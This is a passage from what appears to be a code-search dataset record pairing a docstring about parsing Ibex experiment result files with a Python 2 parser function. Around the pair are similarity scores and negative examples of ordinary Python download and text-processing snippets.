zipfile.ZipFile('ml-latest-small.zip')\n zfile.extractall()\n zfile.close()", "def download(self, url):\n try:\n webFile = urllib.urlopen(url)\n localFile = open(self.workdir + \"/\" + url.split('/')[-1], 'w')\n localFile.write(webFile.read())\n webFile.close()\n localFile.close()\n except IOError:\n print(\"could not get url \" + url)", "def fetch_and_cache(data_url, file, data_dir=\"data\", force=False):\n\n import requests\n from hashlib import md5\n from pathlib import Path\n\n data_dir = Path(data_dir)\n data_dir.mkdir(exist_ok=True)\n file_path = data_dir/Path(file)\n # If the file already exists and we want to force a download then\n # delete the file first so that the creation date is correct.\n if force and file_path.exists():\n file_path.unlink()\n if force or not file_path.exists():\n resp = requests.get(data_url, stream=True)\n file_size = int(resp.headers.get('content-length', 0))\n step = 40\n chunk_size = file_size//step\n with file_path.open('wb') as f:\n for chunk in resp.iter_content(chunk_size): # write file in chunks\n f.write(chunk)\n step -= 1\n print('[' + '#'*(41 - step) + (step)*' ' + ']\\r', end='')\n print(f\"\\nDownloaded {data_url.split('/')[-1]}!\")\n else:\n import time\n time_downloaded = time.ctime(file_path.stat().st_ctime)\n print(\"Using version already downloaded:\", time_downloaded)\n # Compute and print md5 hash of file, whether newly downloaded or not\n m5 = md5()\n m5.update(file_path.read_bytes())\n print(f\"MD5 hash of file: {m5.hexdigest()}\")\n return file_path", "def data_url(self):\n raise NotImplementedError", "def data_url(self):\n raise NotImplementedError", "def download(self, url):\n if url is None:\n return\n user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'\n headers = {'User-Agent': user_agent}\n r = requests.get(url, headers=headers, verify=False)\n if r.status_code == 200:\n r.encoding = 'utf-8'\n return r.text\n return None", "def run_downloader(self):\n \"\"\"calls to the file downloader\"\"\"\n try:\n html = self.get_page(self.url)\n soup = self.get_soup(html)\n if soup is not None: # If we have soup -\n self.get_links(soup)\n self.get_files()\n else:\n self.producer(\"THESS_ENV_CITYOFTHESS_DAILY_YEARLY_DATA_ERROR\", 'data source format is not as expected',\n e)\n return False\n except Exception as e:\n self.producer(\"THESS_ENV_CITYOFTHESS_DAILY_YEARLY_DATA_ERROR\", 'data source format is not as expected', e)\n\n return False\n return True", "def provider_download_data(self, uid: str, data_file: str) -> int:\n return self.context.download(\"/ckks/provider/data/%s\" % uid, data_file, None, None,\n \"CKKS:: failed downloading provider data for uid: %s\" % uid\n )", "def request_data(url): \n requests_cache.install_cache('data_cache')\n while True:\n data = requests.get(url)\n if not data.status_code == 200 or \"try again later\" in data.text:\n continue\n else:\n break\n return data.text", "def download(self):\n file_url = posixpath.join(self.mirrors, self.resources)\n _urlretrieve(file_url, os.path.join(self.root, self.resources))", "def download(self):\n file_url = posixpath.join(self.mirrors, self.resources)\n _urlretrieve(file_url, os.path.join(self.root, self.resources))", "def fetch_repo_file(self, path, save = False, mode = 'w'):\n\t\ttry:\n\t\t\tprint(\"Fetching repo file: {0}\".format(self.config[\"repo\"][\"repo_proto\"] + \"://\" + self.config[\"repo\"][\"repo_addr\"] + \":\" + self.config[\"repo\"][\"repo_port\"] + path))\n\t\t\n\t\t\tdata = urllib.request.urlopen(self.config[\"repo\"][\"repo_proto\"] + 
\"://\" + self.config[\"repo\"][\"repo_addr\"] + \":\" + self.config[\"repo\"][\"repo_port\"] + path).read()\n\n\t\t\tif save != False:\n\t\t\t\tf = open(path, mode)\n\t\t\t\tf.write(data)\n\t\t\t\tf.close()\n\t\t\treturn data\n\t\texcept Exception as e:\n\t\t\tprint(\"Failed to connect to server, exiting...\");\n\t\t\tsys.exit(1)" ]
[ "0.6372641", "0.625264", "0.62305814", "0.62305814", "0.6188294", "0.6158766", "0.6149518", "0.6095374", "0.60664946", "0.60570997", "0.6010867", "0.60009617", "0.59899217", "0.59876364", "0.59813595", "0.59589547", "0.5951379", "0.5951082", "0.59479934", "0.5938637", "0.59257716", "0.5866726", "0.5848593", "0.5824035", "0.58207947", "0.58157593", "0.58142287", "0.58027077", "0.57977873", "0.57806283", "0.5764325", "0.57585496", "0.57584006", "0.5754634", "0.5750337", "0.5747216", "0.5743346", "0.570748", "0.56958514", "0.56868315", "0.568437", "0.56736606", "0.5671862", "0.56718457", "0.567076", "0.56635", "0.565652", "0.56499916", "0.564338", "0.56415576", "0.5634477", "0.5634246", "0.5633767", "0.56268513", "0.56188357", "0.56177765", "0.5592624", "0.55763775", "0.5575407", "0.55753857", "0.55526197", "0.5548782", "0.55364764", "0.5533237", "0.55327004", "0.5524826", "0.55246055", "0.5523757", "0.5519993", "0.5509843", "0.5509735", "0.5508114", "0.5505641", "0.5502354", "0.549553", "0.5490462", "0.5479843", "0.54771334", "0.54767966", "0.547353", "0.5466902", "0.546655", "0.54639035", "0.5463482", "0.546346", "0.5458396", "0.54481435", "0.5445144", "0.54381377", "0.5435728", "0.54316205", "0.5429262", "0.5429262", "0.5426132", "0.5424916", "0.5423493", "0.54228204", "0.5422154", "0.5422154", "0.54169744" ]
0.60267264
10
This function takes in a results file created by Ibex, strips out the comment lines, concatenates lines that belong together, and writes the complete lines to the specified text file
import re


def parse_results_file(filename):
    infile = open(filename, 'r')
    pretext = [line for line in infile.readlines() if line.strip()]
    infile.close()

    text = []
    processed = []
    languages = 'NONE'
    ID = 'NONE'

    moreheader = raw_input('Extra header labels from question field (e.g.: item,condition,factor1,factor2): ')
    stim_type = raw_input('What type are your stims? (i.e. AcceptabilityJudgment): ')
    output_loc = raw_input('Where would you like to put your parsed file? (enter filename path): ')

    # Take out the comment lines
    for line in pretext:
        if re.match('#', line):
            continue
        text.append(line)

    first = 1
    for line in range(len(text)):
        # Get the participant's info from the form fields
        if re.search('Form', text[line]):
            if re.search('number', text[line]):
                ID = re.split('number,', text[line])[1].strip()
            elif re.search('age', text[line]):
                languages = re.split('age,', text[line])[1].strip()
        # Look for the main stimulus type, as entered earlier
        if re.search(stim_type, text[line]):
            if first:
                processed.append(str(ID + ',' + languages + ',' + text[line]))
                first = 0
            else:
                # Continuation of the previous stimulus line: append its
                # non-empty fields onto the line already in progress
                toAmend = processed.pop()
                toAdd = ''
                splits = re.split('NULL,', text[line])
                for thing in splits[1:]:
                    if thing != '':
                        toAdd = str(toAdd + ',' + thing.strip(','))
                processed.append(str(toAmend.strip() + toAdd))
                first = 1
        # If the line is a question line, there's more to append
        if re.search('Question', text[line]):
            toAmend = processed.pop()
            part = re.split(r'\$', text[line])[1]
            part = part.strip('$')
            parts = part.split('%2C')
            processed.append(str(toAmend.strip() + ',' + ','.join(parts) + '\n'))

    # Put it all into a text file
    output = open(output_loc, 'w')
    header = 'ID,Languages,Time sent,MD5 Hash of IP Address,Controller,Item Number,Element Number,Type,Group,Stimulus,Answer,RT,'
    output.write(str(header + moreheader + '\n'))
    for line in processed:
        output.write(line)
    output.close()
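A minimal usage sketch: 'ibex_results.csv' is a hypothetical input path, and the three raw_input prompts are answered interactively when the call runs.

# Hypothetical example call -- 'ibex_results.csv' stands in for a real Ibex results file;
# the parsed output path and extra header labels are typed in at the prompts.
if __name__ == '__main__':
    parse_results_file('ibex_results.csv')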
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def main(inputfname, outfname):\n with open(inputfname, 'rt', encoding='utf8') as fh:\n # first block\n reviews = []\n while True:\n comment = next(fh).strip()\n if not comment:\n # blank line, block separator\n break\n url_moviedb = next(fh).strip()\n url_moviedb, movie_id = fix_moviedb(url_moviedb)\n reviews.append((comment, url_moviedb, movie_id))\n\n # second block\n futures = []\n while True:\n try:\n title = next(fh).strip()\n except StopIteration:\n break\n if not title:\n continue\n url_moviedb = next(fh).strip()\n url_moviedb, movie_id = fix_moviedb(url_moviedb)\n futures.append((title, url_moviedb, movie_id))\n\n lines, viewed = process_reviews(reviews)\n lines.append(\"\")\n lines.extend(process_futures(futures))\n lines.append(\"\")\n\n pelis_lines, raw_pending = proc_pelshtml(futures, viewed)\n\n lines.extend(line.format(enter='', space=' ') for line in raw_pending)\n lines.append(\"\")\n lines.extend(pelis_lines)\n lines.extend(line.format(enter='<br/>', space='&nbsp;') for line in raw_pending)\n\n with open(outfname, 'wt', encoding='utf8') as fh:\n fh.write(\"\\n\".join(lines))", "def process_all(self):\n global multi_comment_line_mode\n multi_comment_line_mode = False\n for line in self.fileToProcess:\n line = line.strip() # creating a strip line, with no whitespace in the beginning and in the end\n # multi_comment_line_mode = False\n # first, we want to filter all the lines which are comments or part of comments\n while line != '':\n ignoring_status,newline = self.shouldTheLineBeIgnored(line)\n if ignoring_status:\n break # we are ignoring the line\n elif (not ignoring_status) and (newline != '') and newline != '$endOfMultiLine':\n line = newline\n continue\n elif not ignoring_status and newline == '$endOfMultiLine':\n break\n else:\n line = self.isThereApartToIgnore(line) #getting the good line\n line = line.strip()\n if line.endswith('$endOfMultiLine'):\n # line = line[:-1]\n line = line[:-15]\n # in this case we don't want to ignore the current line\n # if multi_comment_line_mode:\n # # this comes from the\n list_of_line_strings = re.split('(\\W)', line) # the default of this method is to remove all the white spaces\n list_of_line_strings = list(filter(None, list_of_line_strings))\n global i\n i = 0\n global first_index\n first_index = 0\n global second_index\n second_index = 0\n len_of_list = len(list_of_line_strings)\n while i < len_of_list:\n # first adding the string literals\n if (list_of_line_strings[i] == '\"' and i == 0) or (i>0 and list_of_line_strings[i] == '\"' and\n list_of_line_strings[i-1]!='*'):\n first_index = i\n i = i + 1\n if i == len(list_of_line_strings):\n break\n while list_of_line_strings[i] != '\"':\n i = i + 1\n if i>=len(list_of_line_strings):\n # in case it's the end\n i = first_index\n break\n else:\n continue\n second_index = i\n list_of_line_strings[first_index:second_index + 1] = [\n ''.join(list_of_line_strings[first_index:second_index + 1])]\n i = i + 2\n len_of_list = len(list_of_line_strings)\n else:\n i = i + 1\n j=0\n global skip_mode\n skip_mode = False\n global counter\n counter = 0\n for string in list_of_line_strings:\n if j != len(list_of_line_strings)-1:\n j+=1\n if counter == 1:\n counter = 0\n continue\n if skip_mode and not (string == '*' and list_of_line_strings[j] == '/'):\n continue\n if skip_mode and string == '*' and list_of_line_strings[j] == '/':\n skip_mode = False\n counter = 1\n continue\n if string == \"/\" and (list_of_line_strings[j] == \"/\" ):\n # this is a comment that appeared in the line\n break # in 
this case, there are no more chars to read because it's a note\n if string == \"/\" and list_of_line_strings[j] == \"*\":\n skip_mode = True\n counter = 1\n continue # entering a skip mode\n if string.strip() == '':\n continue\n self.currStringToProcess = string\n type = self.tokenType()\n self.createToken(type,self.currStringToProcess)\n break", "def remove_empty_lines(self):\n self.result_code = open(\"result.c\", \"r\") # Opening the intermediate file in 'read' mode.\n self.line_array = self.result_code.readlines() # Obtaining an array of strings, where each string is a line from the intermediate file.\n self.result_code.close() # Closing the intermediate file.\n self.result_code = open(\"result.c\",\"w\") #Opening the intermediate file in 'write' mode.\n # Looping over all the lines in the input file.\n for line in self.line_array:\n # Checking if the line is empty.\n if line != \"\\n\":\n self.result_code.write(line) # Writing the non-empty line onto the intermediate file.\n self.result_code.close() # Closing the intermediate file.", "def make_result_file(seek_file):\n with open('numbers.txt', 'r') as f, open('result.txt', 'w') as result_file:\n f.seek(seek_file)\n result_file.write(f.readline().replace(' ', '\\n'))\n os.remove('numbers.txt')", "def output(results):\n\n text_file = open(\"problem_1_B_output.txt\", \"w\")\n\n out = \"\"\n\n for i, line in enumerate(results):\n\n string = \"Sample {}: {}, posterior probability of {:.4f}\".format(i + 1,\n line[0],\n line[1])\n\n out += (string + \"\\n\")\n\n text_file.write(out)\n\n text_file.close()", "def write_result(fragment_list, results, output_file):\n if not output_file:\n output_file = results + os.sep + \"prodigal_filtered.txt\"\n try:\n with open(output_file, \"wt\") as output:\n for fragment in fragment_list:\n output.write(\"{1}{0}{2}{0}\".format(\n os.linesep, fragment[0], fill(fragment[1])))\n except IOError:\n sys.exit(\"Error cannot open {0}\".format(output_file))", "def print_solutions(file_):\n with open(file_, 'r') as inp:\n for line in inp:\n print(line[:-5] + str(process_line(line)))", "def read_output(infile):\n global results\n results = []\n for line in infile:\n if line[0] == '#':\n continue\n fields = line.split()\n results.append((int(fields[0]), float(fields[1]), int(fields[2]), fields[3]))", "def turn_files_into_pretty_text(text_files):\n list_of_all_lines = []\n for item in text_files:\n for line in item:\n line = line.rstrip()\n if line not in list_of_all_lines:\n list_of_all_lines.append(line)\n\n for item in list_of_all_lines:\n\n words = item.split('|')\n melon = words[0]\n count = words[1]\n amount = words[2]\n\n print \"Delivered {} {}s for total of ${}\".format(count, melon, amount)", "def file_read(self):\r\n with open(self.source_text_path, 'r') as myfile:\r\n data = myfile.read() \r\n comments = re.compile(r'''\r\n (//[^\\n]*(?:\\n|$)) # Everything between // and the end of the line/file\r\n | # or \r\n (/\\*.*?\\*/) # Everything between /* and */\r\n |\r\n \\/\\*[\\s\\S]*?\\*\\/|([^:]|^)\\/\\/.*$ # Every comment between /** and */ \r\n ''', re.VERBOSE)\r\n self.modified_source_text = comments.sub('\\n', data) \r\n return self.modified_source_text", "def process_pr_results(self, results_files, custom_report):\n \n\n \n output_file = open(os.path.join(self.path, 'raw_results.txt'), 'w')\n \n #Keep track of the last read line before a newline; this will be the best value from an optimization run\n last_line = ''\n #Match a string of the format ( 0.0995749 0.101685 0.108192 0.091224 ) 0.091224 0 
100\n #Contains parameter values, the best optimization value, the cpu time, and some other values, e.g. particle numbers that Copasi likes to add. These could be removed, but they seem useful.\n output_string = r'.*\\(\\s(?P<params>.+)\\s\\)\\s+(?P<best_value>\\S+)\\s+(?P<cpu_time>\\S+)\\s+(?P<function_evals>\\S+)\\.*'\n output_re = re.compile(output_string)\n \n best_value = None\n best_line = None\n \n #Copy the contents of the first file to results.txt\n for line in open(os.path.join(self.path, results_files[0]), 'r'):\n output_file.write(line)\n try:\n if line != '\\n':\n if output_re.match(line):\n current_value = float(output_re.match(line).groupdict()['best_value'])\n if best_value != None:\n if current_value < best_value:\n best_value = current_value\n best_line = line\n elif best_value == None:\n best_value = current_value\n best_line = line\n else:\n pass\n except Exception as e:\n if custom_report:\n pass\n else:\n raise e\n \n #And for all other files, copy everything but the last line\n for filename in results_files[1:]:\n firstLine = True\n for line in open(os.path.join(self.path, filename), 'r'):\n if not firstLine:\n output_file.write(line)\n try:\n if line != '\\n':\n if output_re.match(line):\n current_value = float(output_re.match(line).groupdict()['best_value'])\n if current_value < best_value:\n best_value = current_value\n best_line = line\n else:\n pass\n except Exception as e:\n if custom_report:\n pass\n else:\n raise e\n firstLine = False\n \n \n output_file.close()\n \n #Write the best value to results.txt\n output_file = open(os.path.join(self.path, 'results.txt'), 'w')\n \n output_file.write('Best value\\tCPU time\\tFunction evals\\t')\n \n for parameter in self.get_parameter_estimation_parameters():\n\n output_file.write(parameter[0].encode('utf8'))\n output_file.write('\\t')\n output_file.write('\\n')\n\n best_line_dict = output_re.match(best_line).groupdict()\n\n output_file.write(best_line_dict['best_value'])\n output_file.write('\\t')\n output_file.write(best_line_dict['cpu_time'])\n output_file.write('\\t')\n output_file.write(best_line_dict['function_evals'])\n output_file.write('\\t')\n \n for parameter in best_line_dict['params'].split('\\t'):\n output_file.write(parameter)\n output_file.write('\\t')\n output_file.close()\n \n if best_value != None:\n return True\n else:\n return False", "def main():\n summary = dict()\n gba_file = open('gettysburg.txt', 'r')\n for line in gba_file:\n Process_line(line, summary)\n Pretty_print(summary)", "def reduce_to_readable(medlinefile, pmids, resultfile=\"pubmed_result2.txt\"):\n num = 1\n with open(resultfile, 'w') as f:\n for pmid, dp, ti, ab in parser(medlinefile):\n ab = \"\\n\".join(textwrap.wrap(ab, width=85))\n ti = \"\\n\".join(textwrap.wrap(ti, width=85))\n if pmid in pmids:\n f.write(\"PMID: {}, {}\\n{}. 
{}\\n\\n{}\\n\\n\".format(\n pmid, dp, num, ti, ab))\n num += 1", "def finalize_result(self):\n logging.debug(\"finalize_result()\")\n with open(self.html_file, \"a\") as result_file:\n result_file.write(\"<br/>Analyzis successful\")\n with open(self.txt_file, \"a\") as result_file:\n result_file.write(\"Analyzis successful\")", "def combine_modeloutputs(outputname='xxRENAMExx_Zcombined.txt',\n data='sfr',\n verbose=True):\n if data == 'sfr':\n filepath = '/Users/kschmidt/work/catalogs/NEOGALlines/nebular_emission/'\n modelfilestr = filepath+'nebular_emission_Z0*.txt'\n splitstr = 'emission_Z'\n elif data == 'agn':\n filepath = '/Users/kschmidt/work/catalogs/NEOGALlines/AGN_NLR_nebular_feltre16/'\n modelfilestr = filepath+'nlr_nebular_Z0*.txt'\n splitstr = 'nebular_Z'\n else:\n sys.exit('Inavlid value of data=\"'+data+'\"')\n\n output = filepath+outputname\n if verbose: print(' - Setting up output for:\\n '+output)\n modelfiles = glob.glob(modelfilestr)\n header = open(modelfiles[0]).readline().rstrip()\n if data == 'sfr':\n header = header.replace('##','# Zgas ')\n elif data == 'agn':\n header = header.replace('#','# Zgas ')\n header = header+'\\n'\n\n fout = open(output, 'w')\n fout.write(header)\n if verbose: print(' - Writing the following files to ouput:')\n for mf in modelfiles:\n if verbose: print(' '+mf)\n Zgasstring = mf.split('/')[-1].split(splitstr)[-1].split('.txt')[0]\n\n with open(mf, 'r') as f:\n linesall = f.readlines()\n\n for linestring in linesall:\n if linestring.startswith('#'):\n pass\n elif linestring == ' \\n':\n fout.write(linestring)\n else:\n fout.write('0.'+Zgasstring+' '+linestring)\n\n fout.close()", "def write_results_to_disk(self, result_path,results):\n with open(result_path+\"/results.txt\",\"w+\") as out:\n\n for query_num in results:\n for doc_num in results[query_num]:\n out.write(str(query_num)+\" 0 \"+doc_num+\" 1 42.38 mt\\n\")\n out.close()", "def write_to_file(self, results):\n with open(self.outputFilename, \"w\") as csvFile:\n csvWriter = csv.writer(csvFile, delimiter=',') \n title_row = ('asset_id', 'component_id', 'latitude', 'longitude', 'installation_date', 'commissioning_date', 'street_name', 'cabinet_id', 'nominal_wattage', 'current_time', 'current_LogValue', 'current_IsLogValueOff') \n csvWriter.writerow(title_row)\n for record in results:\n csvWriter.writerow(record)", "def joinRows(r1,r2,outfname):\n outf = open(outfname,'w')\n f1 = file(r1,'r')\n f2 = file(r2,'r')\n for row1 in f1:\n if row1.strip() > '':\n row2 = f2.next()\n outf.write('%s%s\\n' % (row1.strip(),row2.strip()))\n outf.close()", "def concatenate_files(file_one, file_contents, file_headers, output_file):\n with open(file_one, 'r') as input_file:\n with open(output_file, 'w') as output_file:\n for index, line in enumerate(input_file):\n line = line.strip()\n if index == 0:\n write_header(output_file, line, file_headers)\n else:\n if not write_gene_line(output_file, line, file_contents):\n write_zero_expression(output_file, file_contents, line)", "def main():\n in_file_name = \"input.txt\"\n out_file_name = \"output.txt\"\n\n in_file = open(in_file_name, 'r')\n\n out_file = open(out_file_name, 'w')\n out_file.write('IlgizZamaleev' + '\\n')\n\n problems = int(in_file.readline())\n\n for i in range(problems):\n automato = Parser().parse_automata(in_file)\n\n tests = int(in_file.readline())\n\n out_file.write(str(i + 1) + '\\n')\n\n for j in range(tests):\n word = in_file.readline()[:-1]\n out_file.write(automato.check_word(word) + '\\n')\n\n in_file.close()\n 
out_file.close()", "def combine(args, library_sizes):\n with open(args.counts, \"r\") as counts, open(args.results, \"r\") as results:\n with open(args.output_dir + \"counts_results.txt\", \"w+\") as file1, \\\n open(args.output_dir + \"counts_results_rpm.txt\",\"w+\") \\\n as file2, \\\n open(args.output_dir + \"counts_results_rpkm.txt\", \"w+\") \\\n as file3:\n head = True\n for count_line, results_line in zip(counts, results):\n count_line = count_line.strip()\n results_line = results_line.strip()\n\n if head: # Process column names into one header\n head = False\n count_head_parts = count_line.split(\"\\t\")\n results_head_parts = results_line.split(\"\\t\")\n results_head_parts = [\"Chromosome\", \"Start\", \"End\"] + \\\n results_head_parts[1:]\n\n new_head_parts = results_head_parts + \\\n count_head_parts[2:]\n new_head = \"\\t\".join(new_head_parts)\n new_head += \"\\n\"\n file1.write(new_head)\n file2.write(new_head)\n file3.write(new_head)\n\n else:\n process(count_line, results_line,\n file1, file2, file3, library_sizes)", "def dumpText(self,textFileName):\n textFile = file(textFileName,'wb')\n for script in sorted(self.scripts, key=lambda a: a.id.lower()):\n textFile.write('# %s %s\\r\\n' % (script.id,'='*(76 - len(script.id))))\n textFile.write(script.sctx.data.strip())\n textFile.write('\\r\\n\\r\\n')\n textFile.close()", "def extract_text(infile):\n # Get text from mudraw\n text = subprocess.check_output(['mudraw', '-F', 'txt', infile])\n\n # Cleanup raw text\n match = re.search(\n r'.*?Activity \\/ Remarks(?P<table1>.*?)Activities not shown on the ' +\n r'DABS Chart Side:.*?Activity \\/ Remarks(?P<table2>.*?)For detailed ' +\n r'information regarding the DABS',\n text,\n re.MULTILINE | re.DOTALL)\n if not match:\n raise ExtractionError('Could not extract text from PDF.')\n false_or_none_string = lambda x: bool(x) and x.lower() != 'none'\n data = '\\n\\n\\n'.join(match.groups())\n raw_parts = re.sub(r'\\n[ \\t]+\\n', '\\n\\n', data).split('\\n\\n\\n')\n parts = filter(false_or_none_string, map(lambda x: x.strip(), raw_parts))\n\n # Write CSV\n headers = (\n b'Firing-Nr\\nD-/R-Area\\nNOTAM-Nr',\n b'Validity UTC',\n b'Lower Limit\\nAMSL or FL',\n b'Upper Limit\\nAMSL or FL',\n b'Location',\n b'Center Point',\n b'Covering Radius',\n b'Activity / Remarks',\n )\n rows = []\n for i, part in enumerate(parts):\n # Regexes\n multiple_newlines_re = re.compile(r'\\n+')\n height_re = re.compile(r'(GND|[0-9]+m \\/ [0-9]+ft|FL[0-9]{2,3}|REF AIP)')\n center_radius_re = re.compile(r'([0-9]{6}N [0-9]{7}E)\\s+?(.*?NM)')\n\n # Separate columns (warning: hackish code ahead!)\n row = {}\n step1 = re.split(r'([0-2][0-9][0-6][0-9] - [0-2][0-9][0-6][0-9])', part)\n row['nr'] = step1[0].strip()\n timestring = '\\n'.join(step1[1:-1])\n row['validity'] = multiple_newlines_re.sub('\\n', timestring)\n step2 = filter(None, height_re.split(step1[-1].strip()))\n row['lower'] = step2[0]\n row['upper'] = step2[2]\n step3 = filter(None, center_radius_re.split(step2[-1].strip()))\n row['location'] = step3[0].strip()\n row['center'] = step3[1].strip()\n row['radius'] = step3[2].strip()\n row['activity'] = multiple_newlines_re.sub('\\n', step3[3].strip())\n\n # Add to list of rows\n rows.append((\n row['nr'].encode('utf8'),\n row['validity'].encode('utf8'),\n row['lower'].encode('utf8'),\n row['upper'].encode('utf8'),\n row['location'].encode('utf8'),\n row['center'].encode('utf8'),\n row['radius'].encode('utf8'),\n row['activity'].encode('utf8'),\n ))\n\n return tablib.Dataset(*rows, headers=headers)", "def 
write_results(filename, algorithm_name, qty_array, min_coins):\n with open(filename, 'a') as f:\n f.write('{0}\\n'.format(algorithm_name))\n f.write('{0}\\n'.format(qty_array))\n f.write('{0}\\n'.format(min_coins))", "def extract_comments(comments_file, output_filename=direc+\"/comments.txt\"):\r\n if not os.path.exists(output_filename.split(\"/\")[0]):\r\n os.makedirs(output_filename.split(\"/\")[0])\r\n\r\n print(\"Extracting comments from \" + comments_file + \"...\")\r\n comments_dict = {}\r\n with open(output_filename, \"w\", encoding=encoding) as f:\r\n current = 0\r\n for event, child in iterparse(comments_file, events=('start', 'end')):\r\n if current > SAMPLE_SIZE:\r\n break\r\n elif len(child.attrib) > 0 and event == \"start\":\r\n if child.attrib['PostId'] not in comments_dict:\r\n comments_dict[child.attrib['PostId']] = []\r\n comments_dict[child.attrib['PostId']].append(child.attrib['Id'])\r\n clean_comment = clean_markdown(child.attrib['Text'])\r\n line = child.attrib['Id'] + \"\\t\" + child.attrib['PostId'] + \"\\t\" + clean_comment + \"\\t\" + child.attrib['Score'] + \"\\n\"\r\n f.write(line)\r\n\r\n current += 1\r\n print_progress(current, SAMPLE_SIZE)\r\n print(\"\\nFinished extracting comments from \" + comments_file + \".\\n\")\r\n return comments_dict", "def _clear_temp_results(self):\n with open(self._filename, \"w\") as f_out:\n f_out.write(self._delimiter.join(self._get_fields()))\n f_out.write(\"\\n\")", "def print_results():\n # Define 2 files, one for reading binary numbers and the other for writing the results\n file_reader = open('../python-code/binary.txt', 'r')\n file_writer = open('../results.txt', 'w')\n # Read the first 3 values in the file, they are number of t and x variables and if the data is 64 bit\n is_64bit = int(file_reader.readline(), 2)\n number_of_t = int(file_reader.readline(), 2)\n number_of_x = int(file_reader.readline(), 2)\n\n # Loop on every t\n for t in range(number_of_t):\n result = file_reader.readline()\n # If the data is 64 bit then the next line is the 32 MSBs so parse them with the result\n if is_64bit == 1:\n result = file_reader.readline()[:-1] + result\n result = int(result, 2)\n file_writer.write(\"T\" + str(t) + \": \" + str(result))\n # Loop on every x\n for x in range(number_of_x):\n result = file_reader.readline()\n # If the data is 64 bit then the next line is the 32 MSBs so parse them with the result\n if is_64bit == 1:\n result = file_reader.readline()[:-1] + result\n result = int(result, 2)\n file_writer.write(\"\\tX\" + str(x) + \": \" + str(result))\n file_writer.write(\"\\n\")", "def findDocumentsThree():\n lineTwo = 0\n counterTwo = 0\n\n with open('bc.processed3.csv', 'r') as readfile,\\\n open('documentsThree.txt', 'w') as writefile:\n for line in readfile:\n lineTwo += 1\n if re.match('^<document', line):\n counterTwo += 1\n writefile.write(str(counterTwo) + '\\t' +\n str(lineTwo) + '\\t' + line)\n\n divided2 = counterTwo / 2\n lines2 = lineTwo / 2\n writefile.write('\\n' + '--------------------------------' + '\\n')\n writefile.write('divided2: ' + str(divided2) + '\\n')\n writefile.write('lines divided by 2: ' + str(lines2) + '\\n')\n writefile.write('--------------------------------' + '\\n')\n writefile.write('1: ' + '1\\n')\n writefile.write('2: ' + str(lines2))\n print('divided2: ' + str(divided2))\n print('lines divided by 2: ' + str(lines2))", "def readOptimizationResultsFile(self):\n requiredLineNo = 0\n self.createParamters()\n \n self.optimizationResultsFile = open(self.fileName, 'r')\n \n for 
lineIndex, line in enumerate(self.optimizationResultsFile):\n if lineIndex == 0:\n startingPhase1, startingPhase2 = line.split()\n self.startingPhase1, self.startingPhase2 = int(startingPhase1), int(startingPhase2)\n\n elif lineIndex == 1:\n init1, init2, elapsedGreen1, elapsedGreen2 = line.split()\n self.init1, self.init2 = float(init1), float(init2)\n\n elif lineIndex == 2:\n self.processPhaseDuration(line, self.leftCriticalPointsRing1, self.leftCriticalPointsRing2)\n self.processPhaseSequence()\n\n elif lineIndex == 3:\n self.processPhaseDuration(line, self.leftCriticalPointsRing1, self.leftCriticalPointsRing2)\n self.processPhaseSequence()\n\n elif lineIndex == 4:\n self.processPhaseDuration(line, self.leftCriticalPointsRing1, self.leftCriticalPointsRing2)\n self.processPhaseSequence()\n\n elif lineIndex == 5:\n self.processPhaseDuration(line, self.rightCriticalPointsRing1, self.rightCriticalPointsRing2)\n\n elif lineIndex == 6:\n self.processPhaseDuration(line, self.rightCriticalPointsRing1, self.rightCriticalPointsRing2)\n\n elif lineIndex == 7:\n self.processPhaseDuration(line, self.rightCriticalPointsRing1, self.rightCriticalPointsRing2)\n\n elif lineIndex == 14:\n noOfRequest = int(line)\n requiredLineNo = 15 + noOfRequest\n # break\n \n elif lineIndex >=15 and lineIndex < requiredLineNo:\n self.getPriorityRequests(line)\n \n elif lineIndex >=15 and lineIndex >= requiredLineNo:\n break\n # self.optimizationResultsFile = open(self.fileName, 'r')\n # for i, line in enumerate(self.optimizationResultsFile):\n # if i in range(15, requiredLineNo):\n\n self.optimizationResultsFile.close()\n # self.getPriorityRequests(requiredLineNo)\n \n self.getCummulativeValues()\n self.generateTimePhaseDiagram()", "def write_results(gold, pred, ratings, text):\n\n f = open(\"results.txt\", \"w\")\n for g, p, r, t in zip(gold, pred, ratings, text):\n f.write(\"%d\\t%d\\t%d\\t%s\\n\" % (g,p,r,t))\n\n f.close()", "def parsePlanOutput(outputFile, testTempFile):\n status = False\n outputFileRead = open(outputFile, \"r\") \n for line in outputFileRead.readlines():\n if re.search(\"Objects \\*{25}\", line) != None:\n status = True\n if status:\n testTempFile.write(line)\n if status == False:\n sys.stderr.write(\"Warning: Expected Output file content not found\")\n outputFileRead.close()", "def main():\n # get_history_using_HTTP()\n # merge_files()\n # remove_lines()\n remove_duplicated_lines()", "def write_coord_seq():\n \n import os\n choice = input('Enter the name of the file: ')\n filepath = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Data', choice)\n lis = []\n with open(filepath, 'r') as file:\n for line in file:\n if line[:4] == 'ATOM':\n line_split = line.split()\n lis.append(line_split[3:4])\n choice1 = input('Enter name for the output file: ')\n filepath1 = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Results', choice1)\n with open(filepath1, 'w') as myfile:\n for i in lis:\n myfile.writelines(i)\n print('Done!')\n \n with open(choice, 'r') as myfile:\n header = ''\n for line in myfile:\n if line.startswith(\"TITLE\"): \n head_split = line.split()\n header = header + ' '.join(head_split[1:])\n \n choice2 = input('Enter output file name with a .fasta extension: ')\n filepath2 = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Results', choice2)\n z = os.path.join('/home/njesh/python-mini-project-JaneNjeri/Results', choice1)\n with open(z, 'r') as file:\n with open(filepath2, 'w') as output:\n for i in file:\n output.writelines('>' + header + '\\n' + i)\n print('>' + 
